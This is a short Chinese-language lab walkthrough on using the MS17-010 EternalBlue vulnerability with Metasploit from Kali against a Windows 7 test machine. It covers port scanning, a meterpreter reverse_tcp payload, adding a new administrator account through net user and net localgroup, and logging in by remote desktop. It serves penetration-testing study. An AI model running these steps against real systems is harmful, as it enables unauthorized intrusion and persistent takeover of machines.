利用ms17-010漏洞提权

一、打开kali和win7查看IP。
(1) Windows7作为靶机
IP：192.168.43.109
(2) Kali作为攻击机（最新版kaili）
IP：192.168.43.49
二、打开kali进入终端输入nmap +IP查看靶机是否开启445端口。

三、在kali中输入 msfconsole（等待一会可能会有点慢）
四、进入后输人search ms17-010（搜素攻击模块）

五、找到exploit windows/smb/ms17_010_eternalblue,
运行use exploitwindows/smb/ms17_010_eternalblue

• 使用show options 或者options查看选项设置
  可以使用show targets来查看可以攻击的系统版本
  使用show payloads可以加载所有可以使用的攻击向量

六、输入show options 查看和配置RHOST（靶机）和LHOST（操作机）

七、设置TCP连接 set payload windows/x64/meterpreter/reverse_tcp

八、run或exploit进行攻击

九、进如目标机终端

十、可以创建用户 net user xxxx 1234 /add（xxxx用户名 1234密码）
十一、net localgroup administrators xxxx /add （将用户设置为管理员权限）

十二、重新打开一个终端 rdesktop+IP